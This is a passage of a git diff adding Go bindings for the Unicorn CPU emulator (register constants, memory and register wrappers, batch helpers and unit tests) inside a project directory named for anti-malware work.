MIPS_REG_W3 = 100 + MIPS_REG_W4 = 101 + MIPS_REG_W5 = 102 + MIPS_REG_W6 = 103 + MIPS_REG_W7 = 104 + MIPS_REG_W8 = 105 + MIPS_REG_W9 = 106 + MIPS_REG_W10 = 107 + MIPS_REG_W11 = 108 + MIPS_REG_W12 = 109 + MIPS_REG_W13 = 110 + MIPS_REG_W14 = 111 + MIPS_REG_W15 = 112 + MIPS_REG_W16 = 113 + MIPS_REG_W17 = 114 + MIPS_REG_W18 = 115 + MIPS_REG_W19 = 116 + MIPS_REG_W20 = 117 + MIPS_REG_W21 = 118 + MIPS_REG_W22 = 119 + MIPS_REG_W23 = 120 + MIPS_REG_W24 = 121 + MIPS_REG_W25 = 122 + MIPS_REG_W26 = 123 + MIPS_REG_W27 = 124 + MIPS_REG_W28 = 125 + MIPS_REG_W29 = 126 + MIPS_REG_W30 = 127 + MIPS_REG_W31 = 128 + MIPS_REG_HI = 129 + MIPS_REG_LO = 130 + MIPS_REG_P0 = 131 + MIPS_REG_P1 = 132 + MIPS_REG_P2 = 133 + MIPS_REG_MPL0 = 134 + MIPS_REG_MPL1 = 135 + MIPS_REG_MPL2 = 136 + MIPS_REG_CP0_CONFIG3 = 137 + MIPS_REG_CP0_USERLOCAL = 138 + MIPS_REG_ENDING = 139 + MIPS_REG_ZERO = 2 + MIPS_REG_AT = 3 + MIPS_REG_V0 = 4 + MIPS_REG_V1 = 5 + MIPS_REG_A0 = 6 + MIPS_REG_A1 = 7 + MIPS_REG_A2 = 8 + MIPS_REG_A3 = 9 + MIPS_REG_T0 = 10 + MIPS_REG_T1 = 11 + MIPS_REG_T2 = 12 + MIPS_REG_T3 = 13 + MIPS_REG_T4 = 14 + MIPS_REG_T5 = 15 + MIPS_REG_T6 = 16 + MIPS_REG_T7 = 17 + MIPS_REG_S0 = 18 + MIPS_REG_S1 = 19 + MIPS_REG_S2 = 20 + MIPS_REG_S3 = 21 + MIPS_REG_S4 = 22 + MIPS_REG_S5 = 23 + MIPS_REG_S6 = 24 + MIPS_REG_S7 = 25 + MIPS_REG_T8 = 26 + MIPS_REG_T9 = 27 + MIPS_REG_K0 = 28 + MIPS_REG_K1 = 29 + MIPS_REG_GP = 30 + MIPS_REG_SP = 31 + MIPS_REG_FP = 32 + MIPS_REG_S8 = 32 + MIPS_REG_RA = 33 + MIPS_REG_HI0 = 45 + MIPS_REG_HI1 = 46 + MIPS_REG_HI2 = 47 + MIPS_REG_HI3 = 48 + MIPS_REG_LO0 = 45 + MIPS_REG_LO1 = 46 + MIPS_REG_LO2 = 47 + MIPS_REG_LO3 = 48 +) \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/reg_batch.go b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/reg_batch.go new file mode 100644 index 0000000..f5f6c8d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/reg_batch.go @@ -0,0 +1,95 @@ +package unicorn + +import ( + "errors" + "runtime" + "unsafe" +) + +/* +#include + +void *reg_batch_setup(int *regs, int count, uint64_t **vals, int **enums, void ***refs) { + size_t uvsz = sizeof(uint64_t) * count; + size_t ensz = sizeof(int) * count; + size_t ursz = sizeof(uintptr_t) * count; + int i; + + uintptr_t buf = (uintptr_t)calloc(1, uvsz+ensz+ursz); + if (buf == 0) return NULL; + + *vals = (uint64_t *)buf; + *enums = (int *)(buf + uvsz); + *refs = (void **)(buf + uvsz + ensz); + for (i = 0; i < count; i++) { + (*enums)[i] = regs[i]; + (*refs)[i] = &(*vals)[i]; + } + return (void *)buf; +} +*/ +import "C" + +type RegBatch struct { + // cast to local type + vals []uint64 + + // pass these to C + cenums *C.int + crefs *unsafe.Pointer + ccount C.int +} + +func regBatchSetup(regs []int) (buf unsafe.Pointer, vals []uint64, cenums *C.int, crefs *unsafe.Pointer) { + enums := make([]C.int, len(regs)) + for i := 0; i < len(regs); i++ { + enums[i] = C.int(regs[i]) + } + var cvals *C.uint64_t + var inEnums *C.int + if len(regs) > 0 { + inEnums = (*C.int)(unsafe.Pointer(&enums[0])) + } + buf = C.reg_batch_setup(inEnums, C.int(len(regs)), &cvals, &cenums, &crefs) + vals = (*[1 << 24]uint64)(unsafe.Pointer(cvals))[:len(regs)] + return +} + +func NewRegBatch(regs []int) (*RegBatch, error) { + r := &RegBatch{} + var buf unsafe.Pointer + buf, r.vals, r.cenums, r.crefs = regBatchSetup(regs) + if buf == nil { + return nil, errors.New("failed to allocate RegBatch memory") + } + r.ccount = C.int(len(regs)) + // when RegBatch is collected, free C-owned data + runtime.SetFinalizer(r, func(r *RegBatch) { + C.free(buf) + }) + return r, nil +} + +// ReadFast skips copying and returns the internal vals array +func (r *RegBatch) ReadFast(u Unicorn) ([]uint64, error) { + ucerr := C.uc_reg_read_batch(u.Handle(), r.cenums, r.crefs, r.ccount) + if ucerr != ERR_OK { + return nil, errReturn(ucerr) + } + return r.vals, nil +} + +func (r *RegBatch) Read(u Unicorn, vals []uint64) error { + tmp, err := r.ReadFast(u) + if err != nil { + return err + } + copy(vals, tmp[:len(vals)]) + return nil +} + +func (r *RegBatch) Write(u Unicorn, vals []uint64) error { + copy(r.vals[:len(vals)], vals) + ucerr := C.uc_reg_write_batch(u.Handle(), r.cenums, r.crefs, r.ccount) + return errReturn(ucerr) +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/sparc_const.go b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/sparc_const.go new file mode 100644 index 0000000..afd94f4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/sparc_const.go @@ -0,0 +1,99 @@ +package unicorn +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [sparc_const.go] +const ( + +// SPARC registers + + SPARC_REG_INVALID = 0 + SPARC_REG_F0 = 1 + SPARC_REG_F1 = 2 + SPARC_REG_F2 = 3 + SPARC_REG_F3 = 4 + SPARC_REG_F4 = 5 + SPARC_REG_F5 = 6 + SPARC_REG_F6 = 7 + SPARC_REG_F7 = 8 + SPARC_REG_F8 = 9 + SPARC_REG_F9 = 10 + SPARC_REG_F10 = 11 + SPARC_REG_F11 = 12 + SPARC_REG_F12 = 13 + SPARC_REG_F13 = 14 + SPARC_REG_F14 = 15 + SPARC_REG_F15 = 16 + SPARC_REG_F16 = 17 + SPARC_REG_F17 = 18 + SPARC_REG_F18 = 19 + SPARC_REG_F19 = 20 + SPARC_REG_F20 = 21 + SPARC_REG_F21 = 22 + SPARC_REG_F22 = 23 + SPARC_REG_F23 = 24 + SPARC_REG_F24 = 25 + SPARC_REG_F25 = 26 + SPARC_REG_F26 = 27 + SPARC_REG_F27 = 28 + SPARC_REG_F28 = 29 + SPARC_REG_F29 = 30 + SPARC_REG_F30 = 31 + SPARC_REG_F31 = 32 + SPARC_REG_F32 = 33 + SPARC_REG_F34 = 34 + SPARC_REG_F36 = 35 + SPARC_REG_F38 = 36 + SPARC_REG_F40 = 37 + SPARC_REG_F42 = 38 + SPARC_REG_F44 = 39 + SPARC_REG_F46 = 40 + SPARC_REG_F48 = 41 + SPARC_REG_F50 = 42 + SPARC_REG_F52 = 43 + SPARC_REG_F54 = 44 + SPARC_REG_F56 = 45 + SPARC_REG_F58 = 46 + SPARC_REG_F60 = 47 + SPARC_REG_F62 = 48 + SPARC_REG_FCC0 = 49 + SPARC_REG_FCC1 = 50 + SPARC_REG_FCC2 = 51 + SPARC_REG_FCC3 = 52 + SPARC_REG_G0 = 53 + SPARC_REG_G1 = 54 + SPARC_REG_G2 = 55 + SPARC_REG_G3 = 56 + SPARC_REG_G4 = 57 + SPARC_REG_G5 = 58 + SPARC_REG_G6 = 59 + SPARC_REG_G7 = 60 + SPARC_REG_I0 = 61 + SPARC_REG_I1 = 62 + SPARC_REG_I2 = 63 + SPARC_REG_I3 = 64 + SPARC_REG_I4 = 65 + SPARC_REG_I5 = 66 + SPARC_REG_FP = 67 + SPARC_REG_I7 = 68 + SPARC_REG_ICC = 69 + SPARC_REG_L0 = 70 + SPARC_REG_L1 = 71 + SPARC_REG_L2 = 72 + SPARC_REG_L3 = 73 + SPARC_REG_L4 = 74 + SPARC_REG_L5 = 75 + SPARC_REG_L6 = 76 + SPARC_REG_L7 = 77 + SPARC_REG_O0 = 78 + SPARC_REG_O1 = 79 + SPARC_REG_O2 = 80 + SPARC_REG_O3 = 81 + SPARC_REG_O4 = 82 + SPARC_REG_O5 = 83 + SPARC_REG_SP = 84 + SPARC_REG_O7 = 85 + SPARC_REG_Y = 86 + SPARC_REG_XCC = 87 + SPARC_REG_PC = 88 + SPARC_REG_ENDING = 89 + SPARC_REG_O6 = 84 + SPARC_REG_I6 = 67 +) \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/uc.c b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/uc.c new file mode 100644 index 0000000..d21e66f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/uc.c @@ -0,0 +1,25 @@ +#include +#include +#include "_cgo_export.h" + +uc_err uc_reg_read_batch_helper(uc_engine *handle, int *regs, uint64_t *val_out, int count) { + void **val_ref = malloc(sizeof(void *) * count); + int i; + for (i = 0; i < count; i++) { + val_ref[i] = (void *)&val_out[i]; + } + uc_err ret = uc_reg_read_batch(handle, regs, val_ref, count); + free(val_ref); + return ret; +} + +uc_err uc_reg_write_batch_helper(uc_engine *handle, int *regs, uint64_t *val_in, int count) { + void **val_ref = malloc(sizeof(void *) * count); + int i; + for (i = 0; i < count; i++) { + val_ref[i] = (void *)&val_in[i]; + } + uc_err ret = uc_reg_write_batch(handle, regs, (void *const *)val_ref, count); + free(val_ref); + return ret; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/uc.h b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/uc.h new file mode 100644 index 0000000..0602234 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/uc.h @@ -0,0 +1,2 @@ +uc_err uc_reg_read_batch_helper(uc_engine *handle, int *regs, uint64_t *val_out, int count); +uc_err uc_reg_write_batch_helper(uc_engine *handle, int *regs, uint64_t *val_in, int count); diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/unicorn.go b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/unicorn.go new file mode 100644 index 0000000..5c20ab6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/unicorn.go @@ -0,0 +1,235 @@ +package unicorn + +import ( + "runtime" + "sync" + "unsafe" +) + +/* +#cgo CFLAGS: -O3 -Wall -Werror -I../../../include +#cgo LDFLAGS: -L../../../ -lunicorn +#cgo linux LDFLAGS: -L../../../ -lunicorn -lrt +#include +#include "uc.h" +*/ +import "C" + +type UcError C.uc_err + +func (u UcError) Error() string { + return C.GoString(C.uc_strerror(C.uc_err(u))) +} + +func errReturn(err C.uc_err) error { + if err != ERR_OK { + return UcError(err) + } + return nil +} + +type MemRegion struct { + Begin, End uint64 + Prot int +} + +type Unicorn interface { + MemMap(addr, size uint64) error + MemMapProt(addr, size uint64, prot int) error + MemMapPtr(addr, size uint64, prot int, ptr unsafe.Pointer) error + MemProtect(addr, size uint64, prot int) error + MemUnmap(addr, size uint64) error + MemRegions() ([]*MemRegion, error) + MemRead(addr, size uint64) ([]byte, error) + MemReadInto(dst []byte, addr uint64) error + MemWrite(addr uint64, data []byte) error + RegRead(reg int) (uint64, error) + RegReadBatch(regs []int) ([]uint64, error) + RegWrite(reg int, value uint64) error + RegWriteBatch(regs []int, vals []uint64) error + RegReadMmr(reg int) (*X86Mmr, error) + RegWriteMmr(reg int, value *X86Mmr) error + Start(begin, until uint64) error + StartWithOptions(begin, until uint64, options *UcOptions) error + Stop() error + HookAdd(htype int, cb interface{}, begin, end uint64, extra ...int) (Hook, error) + HookDel(hook Hook) error + Query(queryType int) (uint64, error) + Close() error + + ContextSave(reuse Context) (Context, error) + ContextRestore(Context) error + Handle() *C.uc_engine + RegWriteX86Msr(reg uint64, val uint64) error + RegReadX86Msr(reg uint64) (uint64, error) +} + +type uc struct { + handle *C.uc_engine + final sync.Once + hooks map[Hook]uintptr +} + +type UcOptions struct { + Timeout, Count uint64 +} + +func Version() (int, int) { + var major, minor C.uint + C.uc_version(&major, &minor) + return int(major), int(minor) +} + +func NewUnicorn(arch, mode int) (Unicorn, error) { + major, minor := Version() + if major != C.UC_API_MAJOR || minor != C.UC_API_MINOR { + return nil, UcError(ERR_VERSION) + } + var handle *C.uc_engine + if ucerr := C.uc_open(C.uc_arch(arch), C.uc_mode(mode), &handle); ucerr != ERR_OK { + return nil, UcError(ucerr) + } + u := &uc{handle: handle, hooks: make(map[Hook]uintptr)} + runtime.SetFinalizer(u, func(u *uc) { u.Close() }) + return u, nil +} + +func (u *uc) Close() (err error) { + u.final.Do(func() { + if u.handle != nil { + for _, uptr := range u.hooks { + hookMap.remove(uptr) + } + u.hooks = nil + err = errReturn(C.uc_close(u.handle)) + u.handle = nil + } + }) + return err +} + +func (u *uc) StartWithOptions(begin, until uint64, options *UcOptions) error { + ucerr := C.uc_emu_start(u.handle, C.uint64_t(begin), C.uint64_t(until), C.uint64_t(options.Timeout), C.size_t(options.Count)) + return errReturn(ucerr) +} + +func (u *uc) Start(begin, until uint64) error { + return u.StartWithOptions(begin, until, &UcOptions{}) +} + +func (u *uc) Stop() error { + return errReturn(C.uc_emu_stop(u.handle)) +} + +func (u *uc) RegWrite(reg int, value uint64) error { + var val C.uint64_t = C.uint64_t(value) + ucerr := C.uc_reg_write(u.handle, C.int(reg), unsafe.Pointer(&val)) + return errReturn(ucerr) +} + +func (u *uc) RegRead(reg int) (uint64, error) { + var val C.uint64_t + ucerr := C.uc_reg_read(u.handle, C.int(reg), unsafe.Pointer(&val)) + return uint64(val), errReturn(ucerr) +} + +func (u *uc) RegWriteBatch(regs []int, vals []uint64) error { + if len(regs) == 0 { + return nil + } + if len(vals) < len(regs) { + regs = regs[:len(vals)] + } + cregs := make([]C.int, len(regs)) + for i, v := range regs { + cregs[i] = C.int(v) + } + cregs2 := (*C.int)(unsafe.Pointer(&cregs[0])) + cvals := (*C.uint64_t)(unsafe.Pointer(&vals[0])) + ucerr := C.uc_reg_write_batch_helper(u.handle, cregs2, cvals, C.int(len(regs))) + return errReturn(ucerr) +} + +func (u *uc) RegReadBatch(regs []int) ([]uint64, error) { + if len(regs) == 0 { + return nil, nil + } + cregs := make([]C.int, len(regs)) + for i, v := range regs { + cregs[i] = C.int(v) + } + cregs2 := (*C.int)(unsafe.Pointer(&cregs[0])) + vals := make([]uint64, len(regs)) + cvals := (*C.uint64_t)(unsafe.Pointer(&vals[0])) + ucerr := C.uc_reg_read_batch_helper(u.handle, cregs2, cvals, C.int(len(regs))) + return vals, errReturn(ucerr) +} + +func (u *uc) MemRegions() ([]*MemRegion, error) { + var regions *C.uc_mem_region + var count C.uint32_t + ucerr := C.uc_mem_regions(u.handle, ®ions, &count) + if ucerr != C.UC_ERR_OK { + return nil, errReturn(ucerr) + } + ret := make([]*MemRegion, count) + tmp := (*[1 << 24]C.struct_uc_mem_region)(unsafe.Pointer(regions))[:count] + for i, v := range tmp { + ret[i] = &MemRegion{ + Begin: uint64(v.begin), + End: uint64(v.end), + Prot: int(v.perms), + } + } + C.uc_free(unsafe.Pointer(regions)) + return ret, nil +} + +func (u *uc) MemWrite(addr uint64, data []byte) error { + if len(data) == 0 { + return nil + } + return errReturn(C.uc_mem_write(u.handle, C.uint64_t(addr), unsafe.Pointer(&data[0]), C.size_t(len(data)))) +} + +func (u *uc) MemReadInto(dst []byte, addr uint64) error { + if len(dst) == 0 { + return nil + } + return errReturn(C.uc_mem_read(u.handle, C.uint64_t(addr), unsafe.Pointer(&dst[0]), C.size_t(len(dst)))) +} + +func (u *uc) MemRead(addr, size uint64) ([]byte, error) { + dst := make([]byte, size) + return dst, u.MemReadInto(dst, addr) +} + +func (u *uc) MemMapProt(addr, size uint64, prot int) error { + return errReturn(C.uc_mem_map(u.handle, C.uint64_t(addr), C.size_t(size), C.uint32_t(prot))) +} + +func (u *uc) MemMap(addr, size uint64) error { + return u.MemMapProt(addr, size, PROT_ALL) +} + +func (u *uc) MemMapPtr(addr, size uint64, prot int, ptr unsafe.Pointer) error { + return errReturn(C.uc_mem_map_ptr(u.handle, C.uint64_t(addr), C.size_t(size), C.uint32_t(prot), ptr)) +} + +func (u *uc) MemProtect(addr, size uint64, prot int) error { + return errReturn(C.uc_mem_protect(u.handle, C.uint64_t(addr), C.size_t(size), C.uint32_t(prot))) +} + +func (u *uc) MemUnmap(addr, size uint64) error { + return errReturn(C.uc_mem_unmap(u.handle, C.uint64_t(addr), C.size_t(size))) +} + +func (u *uc) Query(queryType int) (uint64, error) { + var ret C.size_t + ucerr := C.uc_query(u.handle, C.uc_query_type(queryType), &ret) + return uint64(ret), errReturn(ucerr) +} + +func (u *uc) Handle() *C.uc_engine { + return u.handle +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/unicorn_const.go b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/unicorn_const.go new file mode 100644 index 0000000..ebc2af2 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/unicorn_const.go @@ -0,0 +1,111 @@ +package unicorn +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [unicorn_const.go] +const ( + API_MAJOR = 1 + + API_MINOR = 0 + VERSION_MAJOR = 1 + + VERSION_MINOR = 0 + VERSION_EXTRA = 2 + SECOND_SCALE = 1000000 + MILISECOND_SCALE = 1000 + ARCH_ARM = 1 + ARCH_ARM64 = 2 + ARCH_MIPS = 3 + ARCH_X86 = 4 + ARCH_PPC = 5 + ARCH_SPARC = 6 + ARCH_M68K = 7 + ARCH_MAX = 8 + + MODE_LITTLE_ENDIAN = 0 + MODE_BIG_ENDIAN = 1073741824 + + MODE_ARM = 0 + MODE_THUMB = 16 + MODE_MCLASS = 32 + MODE_V8 = 64 + MODE_ARM926 = 128 + MODE_ARM946 = 256 + MODE_ARM1176 = 512 + MODE_MICRO = 16 + MODE_MIPS3 = 32 + MODE_MIPS32R6 = 64 + MODE_MIPS32 = 4 + MODE_MIPS64 = 8 + MODE_16 = 2 + MODE_32 = 4 + MODE_64 = 8 + MODE_PPC32 = 4 + MODE_PPC64 = 8 + MODE_QPX = 16 + MODE_SPARC32 = 4 + MODE_SPARC64 = 8 + MODE_V9 = 16 + + ERR_OK = 0 + ERR_NOMEM = 1 + ERR_ARCH = 2 + ERR_HANDLE = 3 + ERR_MODE = 4 + ERR_VERSION = 5 + ERR_READ_UNMAPPED = 6 + ERR_WRITE_UNMAPPED = 7 + ERR_FETCH_UNMAPPED = 8 + ERR_HOOK = 9 + ERR_INSN_INVALID = 10 + ERR_MAP = 11 + ERR_WRITE_PROT = 12 + ERR_READ_PROT = 13 + ERR_FETCH_PROT = 14 + ERR_ARG = 15 + ERR_READ_UNALIGNED = 16 + ERR_WRITE_UNALIGNED = 17 + ERR_FETCH_UNALIGNED = 18 + ERR_HOOK_EXIST = 19 + ERR_RESOURCE = 20 + ERR_EXCEPTION = 21 + MEM_READ = 16 + MEM_WRITE = 17 + MEM_FETCH = 18 + MEM_READ_UNMAPPED = 19 + MEM_WRITE_UNMAPPED = 20 + MEM_FETCH_UNMAPPED = 21 + MEM_WRITE_PROT = 22 + MEM_READ_PROT = 23 + MEM_FETCH_PROT = 24 + MEM_READ_AFTER = 25 + HOOK_INTR = 1 + HOOK_INSN = 2 + HOOK_CODE = 4 + HOOK_BLOCK = 8 + HOOK_MEM_READ_UNMAPPED = 16 + HOOK_MEM_WRITE_UNMAPPED = 32 + HOOK_MEM_FETCH_UNMAPPED = 64 + HOOK_MEM_READ_PROT = 128 + HOOK_MEM_WRITE_PROT = 256 + HOOK_MEM_FETCH_PROT = 512 + HOOK_MEM_READ = 1024 + HOOK_MEM_WRITE = 2048 + HOOK_MEM_FETCH = 4096 + HOOK_MEM_READ_AFTER = 8192 + HOOK_INSN_INVALID = 16384 + HOOK_MEM_UNMAPPED = 112 + HOOK_MEM_PROT = 896 + HOOK_MEM_READ_INVALID = 144 + HOOK_MEM_WRITE_INVALID = 288 + HOOK_MEM_FETCH_INVALID = 576 + HOOK_MEM_INVALID = 1008 + HOOK_MEM_VALID = 7168 + QUERY_MODE = 1 + QUERY_PAGE_SIZE = 2 + QUERY_ARCH = 3 + QUERY_TIMEOUT = 4 + + PROT_NONE = 0 + PROT_READ = 1 + PROT_WRITE = 2 + PROT_EXEC = 4 + PROT_ALL = 7 +) \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/unicorn_test.go b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/unicorn_test.go new file mode 100644 index 0000000..fd65207 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/unicorn_test.go @@ -0,0 +1,74 @@ +package unicorn + +import ( + "testing" +) + +func TestMemUnmap(t *testing.T) { + mu, err := NewUnicorn(ARCH_X86, MODE_32) + if err != nil { + t.Fatal(err) + } + if err := mu.MemMap(0x1000, 0x1000); err != nil { + t.Fatal(err) + } + tmp := make([]byte, 1024) + if err := mu.MemWrite(0x1000, tmp); err != nil { + t.Fatal(err) + } + if err := mu.MemUnmap(0x1000, 0x1000); err != nil { + t.Fatal(err) + } + if err := mu.MemWrite(0x1000, tmp); err.(UcError) != ERR_WRITE_UNMAPPED { + t.Fatalf("Expected ERR_WRITE_UNMAPPED, got: %v", err) + } +} + +func TestDoubleClose(t *testing.T) { + mu, err := NewUnicorn(ARCH_X86, MODE_32) + if err != nil { + t.Fatal(err) + } + if err := mu.Close(); err != nil { + t.Fatal(err) + } + if err := mu.Close(); err != nil { + t.Fatal(err) + } +} + +func TestMemRegions(t *testing.T) { + mu, err := NewUnicorn(ARCH_X86, MODE_32) + if err != nil { + t.Fatal(err) + } + err = mu.MemMap(0x1000, 0x1000) + if err != nil { + t.Fatal(err) + } + regions, err := mu.MemRegions() + if err != nil { + t.Fatal(err) + } + if len(regions) != 1 { + t.Fatalf("returned wrong number of regions: %d != 1", len(regions)) + } + r := regions[0] + if r.Begin != 0x1000 || r.End != 0x1fff || r.Prot != 7 { + t.Fatalf("incorrect region: %#v", r) + } +} + +func TestQuery(t *testing.T) { + mu, err := NewUnicorn(ARCH_ARM, MODE_THUMB) + if err != nil { + t.Fatal(err) + } + mode, err := mu.Query(QUERY_MODE) + if err != nil { + t.Fatal(err) + } + if mode != MODE_THUMB { + t.Fatalf("query returned invalid mode: %d != %d", mode, MODE_THUMB) + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/x86.go b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/x86.go new file mode 100644 index 0000000..7ffa25d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/x86.go @@ -0,0 +1,54 @@ +package unicorn + +import ( + "unsafe" +) + +// #include +// #include +import "C" + +type X86Mmr struct { + Selector uint16 + Base uint64 + Limit uint32 + Flags uint32 +} + +func (u *uc) RegWriteMmr(reg int, value *X86Mmr) error { + var val C.uc_x86_mmr + val.selector = C.uint16_t(value.Selector) + val.base = C.uint64_t(value.Base) + val.limit = C.uint32_t(value.Limit) + val.flags = C.uint32_t(value.Flags) + ucerr := C.uc_reg_write(u.handle, C.int(reg), unsafe.Pointer(&val)) + return errReturn(ucerr) +} + +func (u *uc) RegReadMmr(reg int) (*X86Mmr, error) { + var val C.uc_x86_mmr + ucerr := C.uc_reg_read(u.handle, C.int(reg), unsafe.Pointer(&val)) + ret := &X86Mmr{ + Selector: uint16(val.selector), + Base: uint64(val.base), + Limit: uint32(val.limit), + Flags: uint32(val.flags), + } + return ret, errReturn(ucerr) +} + +func (u *uc) RegWriteX86Msr(reg uint64, val uint64) error { + msr := C.uc_x86_msr{ + rid: C.uint32_t(reg), + value: C.uint64_t(val), + } + return errReturn(C.uc_reg_write(u.handle, X86_REG_MSR, unsafe.Pointer(&msr))) +} + +func (u *uc) RegReadX86Msr(reg uint64) (uint64, error) { + msr := C.uc_x86_msr{ + rid: C.uint32_t(reg), + } + ucerr := C.uc_reg_read(u.handle, X86_REG_MSR, unsafe.Pointer(&msr)) + return uint64(msr.value), errReturn(ucerr) +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/x86_const.go b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/x86_const.go new file mode 100644 index 0000000..33899a6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/x86_const.go @@ -0,0 +1,1602 @@ +package unicorn +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [x86_const.go] +const ( + +// X86 registers + + X86_REG_INVALID = 0 + X86_REG_AH = 1 + X86_REG_AL = 2 + X86_REG_AX = 3 + X86_REG_BH = 4 + X86_REG_BL = 5 + X86_REG_BP = 6 + X86_REG_BPL = 7 + X86_REG_BX = 8 + X86_REG_CH = 9 + X86_REG_CL = 10 + X86_REG_CS = 11 + X86_REG_CX = 12 + X86_REG_DH = 13 + X86_REG_DI = 14 + X86_REG_DIL = 15 + X86_REG_DL = 16 + X86_REG_DS = 17 + X86_REG_DX = 18 + X86_REG_EAX = 19 + X86_REG_EBP = 20 + X86_REG_EBX = 21 + X86_REG_ECX = 22 + X86_REG_EDI = 23 + X86_REG_EDX = 24 + X86_REG_EFLAGS = 25 + X86_REG_EIP = 26 + X86_REG_EIZ = 27 + X86_REG_ES = 28 + X86_REG_ESI = 29 + X86_REG_ESP = 30 + X86_REG_FPSW = 31 + X86_REG_FS = 32 + X86_REG_GS = 33 + X86_REG_IP = 34 + X86_REG_RAX = 35 + X86_REG_RBP = 36 + X86_REG_RBX = 37 + X86_REG_RCX = 38 + X86_REG_RDI = 39 + X86_REG_RDX = 40 + X86_REG_RIP = 41 + X86_REG_RIZ = 42 + X86_REG_RSI = 43 + X86_REG_RSP = 44 + X86_REG_SI = 45 + X86_REG_SIL = 46 + X86_REG_SP = 47 + X86_REG_SPL = 48 + X86_REG_SS = 49 + X86_REG_CR0 = 50 + X86_REG_CR1 = 51 + X86_REG_CR2 = 52 + X86_REG_CR3 = 53 + X86_REG_CR4 = 54 + X86_REG_CR5 = 55 + X86_REG_CR6 = 56 + X86_REG_CR7 = 57 + X86_REG_CR8 = 58 + X86_REG_CR9 = 59 + X86_REG_CR10 = 60 + X86_REG_CR11 = 61 + X86_REG_CR12 = 62 + X86_REG_CR13 = 63 + X86_REG_CR14 = 64 + X86_REG_CR15 = 65 + X86_REG_DR0 = 66 + X86_REG_DR1 = 67 + X86_REG_DR2 = 68 + X86_REG_DR3 = 69 + X86_REG_DR4 = 70 + X86_REG_DR5 = 71 + X86_REG_DR6 = 72 + X86_REG_DR7 = 73 + X86_REG_DR8 = 74 + X86_REG_DR9 = 75 + X86_REG_DR10 = 76 + X86_REG_DR11 = 77 + X86_REG_DR12 = 78 + X86_REG_DR13 = 79 + X86_REG_DR14 = 80 + X86_REG_DR15 = 81 + X86_REG_FP0 = 82 + X86_REG_FP1 = 83 + X86_REG_FP2 = 84 + X86_REG_FP3 = 85 + X86_REG_FP4 = 86 + X86_REG_FP5 = 87 + X86_REG_FP6 = 88 + X86_REG_FP7 = 89 + X86_REG_K0 = 90 + X86_REG_K1 = 91 + X86_REG_K2 = 92 + X86_REG_K3 = 93 + X86_REG_K4 = 94 + X86_REG_K5 = 95 + X86_REG_K6 = 96 + X86_REG_K7 = 97 + X86_REG_MM0 = 98 + X86_REG_MM1 = 99 + X86_REG_MM2 = 100 + X86_REG_MM3 = 101 + X86_REG_MM4 = 102 + X86_REG_MM5 = 103 + X86_REG_MM6 = 104 + X86_REG_MM7 = 105 + X86_REG_R8 = 106 + X86_REG_R9 = 107 + X86_REG_R10 = 108 + X86_REG_R11 = 109 + X86_REG_R12 = 110 + X86_REG_R13 = 111 + X86_REG_R14 = 112 + X86_REG_R15 = 113 + X86_REG_ST0 = 114 + X86_REG_ST1 = 115 + X86_REG_ST2 = 116 + X86_REG_ST3 = 117 + X86_REG_ST4 = 118 + X86_REG_ST5 = 119 + X86_REG_ST6 = 120 + X86_REG_ST7 = 121 + X86_REG_XMM0 = 122 + X86_REG_XMM1 = 123 + X86_REG_XMM2 = 124 + X86_REG_XMM3 = 125 + X86_REG_XMM4 = 126 + X86_REG_XMM5 = 127 + X86_REG_XMM6 = 128 + X86_REG_XMM7 = 129 + X86_REG_XMM8 = 130 + X86_REG_XMM9 = 131 + X86_REG_XMM10 = 132 + X86_REG_XMM11 = 133 + X86_REG_XMM12 = 134 + X86_REG_XMM13 = 135 + X86_REG_XMM14 = 136 + X86_REG_XMM15 = 137 + X86_REG_XMM16 = 138 + X86_REG_XMM17 = 139 + X86_REG_XMM18 = 140 + X86_REG_XMM19 = 141 + X86_REG_XMM20 = 142 + X86_REG_XMM21 = 143 + X86_REG_XMM22 = 144 + X86_REG_XMM23 = 145 + X86_REG_XMM24 = 146 + X86_REG_XMM25 = 147 + X86_REG_XMM26 = 148 + X86_REG_XMM27 = 149 + X86_REG_XMM28 = 150 + X86_REG_XMM29 = 151 + X86_REG_XMM30 = 152 + X86_REG_XMM31 = 153 + X86_REG_YMM0 = 154 + X86_REG_YMM1 = 155 + X86_REG_YMM2 = 156 + X86_REG_YMM3 = 157 + X86_REG_YMM4 = 158 + X86_REG_YMM5 = 159 + X86_REG_YMM6 = 160 + X86_REG_YMM7 = 161 + X86_REG_YMM8 